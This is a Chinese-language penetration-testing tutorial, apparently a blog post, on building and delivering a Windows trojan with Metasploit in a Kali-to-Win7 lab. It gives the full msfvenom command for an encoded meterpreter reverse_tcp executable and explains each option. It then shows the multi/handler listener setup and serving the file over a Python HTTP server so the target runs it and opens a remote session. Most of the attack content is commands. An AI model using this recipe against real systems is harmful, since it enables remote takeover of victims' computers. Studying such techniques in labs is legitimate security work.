MSF内网渗透系列1-生成木马

环境:
攻击机:kali 2020.1b
靶机:win7 32位

1.利用metasploit生成一个木马。
利用msfvenom生成一个简单的windows木马

命令:msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=listen_ip LPORT=listen_port -b"\x00" -e x86/shikata_ga_nai -f exe > msf.exe

mvfvenom命令行选项

Option:
    -p, --payload           指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定
    -l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
    -n, --nopsled            为payload预先指定一个NOP滑动长度
    -f, --format             指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
    -e, --encoder    [encoder]       指定需要使用的encoder(编码器)
    -a, --arch         指定payload的目标架构
        --platform         指定payload的目标平台
    -s, --space              设定有效攻击荷载的最大长度
    -b, --bad-chars            设定规避字符集,比如: '\x00\xff'
    -i, --iterations          指定payload的编码次数
    -c, --add-code             指定一个附加的win32 shellcode文件
    -x, --template             指定一个自定义的可执行文件作为模板
    -k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行
        --payload-options            列举payload的标准选项
    -o, --out                  保存payload
    -v, --var-name             指定一个自定义的变量,以确定输出格式
        --shellest                   最小化生成payload
    -h, --help                       查看帮助选项
        --help-formats               查看msf支持的输出格式列表

所以上面生成木马的命令意思是:生成一个windows 32位经过编码的木马,监听IP和端口为你msf监听的IP和端口,且过滤了\x00
运行该命令,是用ls查看文件,msf.exe已经生成
2.开启msf监听

msf> use exploit/multi/handler
使用handler模块
msf exploit(handler)> set payload windows/meterpreter/reverse_tcp
设置监听payload,和生成木马的payload一样
msf exploit(handler)> set lhost listen_ip
设置监听IP
msf exploit(handler)> set lport listen_ip
设置监听端口
msf exploit(handler)>show options
查看配置信息,也可以使用info进行查看该模块的详细信息
msf exploit(handler)>exploit
执行该模块

3.传递木马
在kali里面使用python简单开启一个http server

root@kali:~# python -m SimpleHTTPServer 888

win7靶机访问kali 888端口进行下载msf.exe程序,并运行
kali接收到一个session
使用 sessions 查看,此时已经获取到一个低权限的session,下一阶段进行权限的提升。

你可能感兴趣的:(MSF内网渗透系列1-生成木马)